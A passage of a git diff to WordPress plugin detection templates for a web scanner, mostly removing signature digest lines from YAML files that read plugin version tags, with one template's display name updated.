b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cfd7ea8d09607ce19cb3acc996f8edf04c248af9219f5179981f18cfc58e67b02204617673cd30134d4eb6009ff9dc057e466ab06d1c0937a1a936504a11346655d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 9447eefce5..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053629a1f8dbc2129095bc0c59e624420cf6f9e58fc895f6282ef1b6868d0448c02204be07a1b073c13687090a44dec6d0885d4a863cc2313d50a6706037a6e8259bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index b713b9dfcf..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204090c001c08407db2736b0c1bce27aeef80dd07e6b0bc19ed3f9591889e52d1102206f71b893e4efaaf9780e9c761a836e372aa8951fbc6f019e5aef9ae9a6f159ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 0adacf7104..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2ac2c5c4018dbc04d013e7dd6d6329aed676865ef8daf43a4f4b9051ea72721022004f0f4abb9a29928fda90d6ef7c47fba4c9b83961dc300901fa03106a2677ac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index bd73e21040..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220166a059abad47d7810570e6774f74158bf750b6709c96a77756130e70d29cbb2022100bf66279eb5123f8cecc13dd1ed4087eeeb0d072eaffaa41977a70cc829785c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index ff9f8a3c3d..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017ee505dcca18ebab680043b9925f57984d15f24be30f3f0ec870f6a7dceeca8022100abfbd24fce7dae963b3ed486a507e06d30ba8df3471283206e59a6eca66a25e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6d1ea5b32d..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204016d00b414a89aa5ee3e46fd9bf70b4e6e52f59a21d6c051a3649b5ddcc3e6e022100a287c6b188915ed6124a9a1d037cfa445780b9e261d0d4dba376f3f2905f6a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 2d65493ac7..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb0d6a1c264fd9f2133b11d868175b69427130562ffeda26f311e59499c31ff602204560a3e5ec893280c5d927554304b0ef9a401f8f515662c0c8853b675f89956d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index da8732fc6a..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d6a1f77e361161159079a8c9808d996b8f300de6e7f9879c44b7a5fcbaa754c70220549f66c482dc25ce5859081734f6859d254dcb5e1faf2a50059fb884d889a3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index f34dc09462..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc067167944e4479be804de00ef189955c02218d61594796a5528c5f14efbeeb022100cc886ea0fd38c9f26a26735b898b0e92d2664441cf3da7f97fbe0a0781348354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index b53a37add5..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012e44aec7725638cd18ee6ca09389a5b8a098851e09d76c0c61463e5ef87dae2022100c5cd95f4d634e51f124e0b09cdeb6f6d59c56a90a1375be8dcc0b966437f6102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index cd574719af..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a7409f7c925e71550c67e07908d0b5984127972a2d98e5f0a71db575e87482b022100e7b8b47bdfc6245558f4e851998901f5eee2ba79bf99f77e4bcaa77c1dd32e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index e1c9a3edc0..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe4d7a22bfa930cc84cf3e766d3d24b173cf9ddddec0e2909659ab7b9edac8170220428436f17b011cd10dde2133a64ee98ab25db91ec1198ff9e081e40a1cec7891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 977c645035..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f42a4cae6ddf40b5c8d65917db76e4a736afe8b4a5aaa4bd8cd70e04660e82b40220502b93dc5c68027663c8a3529cb4074ab0e7296354beda213a9ba553056eccd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index d81de075a1..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087f1678cdce7b228c96bc3fa1c81648cb1778f9d7e529fd4e3af9eabbcb80f56022100e21925e821ab239facc011f7be0a73ae79116a36a6393149d76d53b2678aaf5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 6c5ac3baf4..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011b93e838a576f4d3d9beea54328017dd16c648cbe1ddfef8a05c597517f072b022100b1cefc60d6ccbd4614b41f2823da7842e4285c1ddb7cecaadbfc03d732f87e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 065258c95d..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068e59c0035d3c92eac3e53fb8bccd089e2ef8e409751d733b6aa9f493445179f022100bc52130b4aba52b9abbb507f6d3e38d206caa3ccde453b292b3086995e1f5e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 9293d01624..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aad2510bd151347032697d590682148f6658eb33922225cead84a0c15d1dbe6b02204a27be731170c7a3c1fbd71f672f9345022caaf8bb0a570ed88477f41ebe611c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index df886834ba..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004060c2f261be85351b8193a3a43fd42342b024bc89aa7e2009956b8022f4624022032df190f49c0657edb79e98c39f63ca750cae5dae460dfc35c8628f2610b3fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 92d0420bb3..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d82ad204ba61bb7164eeb5fa952765bf807868964de02e4a9ab7dc983e53bef022100ce9689aefce36b88f8e67d7c8c0aacf0863c7c68e2f4d7ecf2f2d5744b7ff2aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 54f28bcd0e..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd0171e3e288ea767ed340ca8252d7f7c818ffcc658327b47557d4431cd519aa022100866ede0cb789962656f0df49e2ba1039061cdb86dfbf49cb32ce3c2dea8a81fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index aa6d437548..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbfeffe12d3f9b7ca85f90ed53ab0349cb98788ae33a7ccd359c0cabfa889937022016725322eed4c545d8ee64c33677227d98c42a634240c4672cd6166fd4e5a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index dd8717dcb2..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d2f89e74851e58ad68f44fbc00705839b30857b79a677ff8c7a9937a2c64f88022100aafb996dcdd048384f32c57de2f1a8235887ca8b33fc54ea68f9682073f200e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index f21e53228b..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcf3db9cbeb1730a802e1802a57c54eafc4e2fba0cbd812190964a335a6fe7a00220468ef4049eae008d783b7b67dfbff39a669f58a9abc24aa2aa6db249b5109f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 9fd87c0432..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fecea6afbc40fd74001395896acf1b30b19f856d8ff9c0aba27d90eed6bbc8c5022100bf215c242a5e18bea1730661e86fee7d576fa150feebab75506ab63070e13e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index ae507559b3..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220314a4c8ecc934abb59e2eb470b3be784ae64fe7b6403f95130c4821a58cd3504022100e692853b3c1669ed8d42c712997a1466c04d7b1e646866569b2867c08547c3ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 0ece59bbbf..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e0dfb1128d1cda1207be0c50a778abc43ebe5e6c085581c43d50e76ca63da6c02203a3c4bbe9dc45f0bdae3f6fb18d8b0dfd70c8793fee098a06d30c6d9e9b69ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 90802a3766..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201513d0ee12dbb91822e10d3db8be7e387227f8a74514b942454d7263c0af067102202e7de7aee2ce00b92a97d62cc18371d473d88e62131d4c88d59e071a875104e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index a52f036977..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008aadaf04995cde392c0c04d8a98c22ddd393fbb9d2e8a23a7f8bdf9d9e37735c02203d0950232ab17b87e9513a5298435eb3075dfda62eacbd92e180a3eca7340bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 98c885ef99..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c1dd3fa78b85d538e1b5951ff23725442e0b63d779abeae89809ddccb55355502204280df661d93c01f1617cea9616e35791a8729bf4447c53fbf3a1bd2a85117d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index cbee734269..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e133684f432712e81c8570016efc2ad1fc2654b91aaafb25aaba244e134f17b002203c15cbaf49d1f0cdcb5a24de66cd7be429b7c87d23f8cc276970dff5e06368a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6f4bcf2545..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220525904ddb0b069e2164b263ab6601ca85721f5469b28b022b87f2303e9f2e0ee022100888e35d8de626bf523638a6ed01b830aac3b88c4f746b96ef89a501ba97256cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 0df27ffced..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a762ee27dc941b7bb17a5d4a2ba520c5c9745a505cc658e0e1f0e8b8c98ee637022100f72e12f184fde733c4f8319e399d99e86824f318e09e8ddd33af22e63669fb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 7f805bc78a..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eee3ee1a4c6c4a3cf2a727f2724e7d91b3dd28d8b85b53effbb5d7a490016fb4022100ef30bd5f1d04f4c61449dc06fae53ed2b27b524f1b02ec96b7ef0714fafe3593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index c593ecd9da..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035e23b0fcb1eae118b330b06f27f922295127203d327787730576b4398b1181c02202219f15393df4092804e23ff98e3b312e80c21b947b44eb2c8fdbb7a3db08e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index d646b93171..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069d185e708d79f2539b188d366ec68f069ff6e6c8d5ff11e2a04616684d3e5a80220593e20f63e0793e09867a641413ad56b11b2f5d6d741040ffb73e359cba1af16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 2f6a30f258..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220490a32ba460eaeffc2c2b37be79a1b25376cba2fd18816c4d2c2317efde5f59102204d2b1c8633455a478c1952a05534088091e5240afad4cb7405afea0e23d0e13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b8c9fce3be..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017371035f143b0d21f58a8521a5ac68a21c7d0e428f850db6c2945cce6224de402201f7d1ba518620b4817fb38ac790bbbd55180923a9c35de784021db5d3081b47c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 9f90c59028..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f77bb6cc0af4f7f1f3517efcd0a60007848147e6b23275783309180c15e4fec022038dcb32a271f20c5e6150edeff22bce776454a45fa962c272a0197277c1a2969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index d1c67879ae..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-wp-smtp info: - name: Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin Detection + name: Easy WP SMTP – WordPress SMTP and Email Logs' Gmail, Office 365, Outlook, Custom SMTP, and more Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cbb4ab1ecb6d7772754e15aacdc5f5ac93562c240b6df7d2ab7d0e1a64678700221008638722958a574199b188b58d737f920d0b325ac90c2bf9638f8725b422814b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 46162743a8..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202245e20826ceb1bc1861146581bcf03e0adb1db7e38204dc5ef2817ed06cf2e102207541942da845963a9f08245a025b2121354291deb1c602b6f3808ab261bcb757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 07947e29dd..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d37d9705c5e7a9f0b935cbdc2bafea0d5bfabd99fef4bf264fdbc3496f91f8720220319ccdc96c979eb145e36d9090e9f12a5957f9856b45c3d93a264371cbb1890a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5bbab2b6b1..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7428bfa2e3519bbe94bf1dadea21b13d5093f051577b764f0a78c6cdfdc64bc022029632e972c84ed40b61bf9a22b083a68d0de72b9ae9130d6464cbcb232cf1b91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 9808639ccf..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204666dc86947420231526c0be85ed8cf94c957606d0b0ae1d41d99b1d7f8ced03022100eaa48f848689386b7bfa1ed8cb3abfbb81e48c3005581f795bcdc9dae1f80497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 9419c7289d..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e64f356d8b4640ea1cccee85fb837660979b49118c86e3f1bf79e68a6d39479202200edfc794060a5af67e27caeac27cf56da4dae907b3e55857dee5a84440cbf3ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index bf1690615d..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aedce5a99fed63f397b2ceebae837fa610706cb1abbf460cfa4cf2865ebe10ce02201f2c4fd063f65c9d968cb89e2449a5e4a6ab338b355194c8e743dc65e2eae1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 152399799c..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5cc7645ee5779d9c9baac100226bebcb0e0e3b46eb025f82d6bc33a6b132eba022100cc4710d8af997bb46c026d6b03dd99e54fdae08a13675aec1f00a1e8a9d99fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 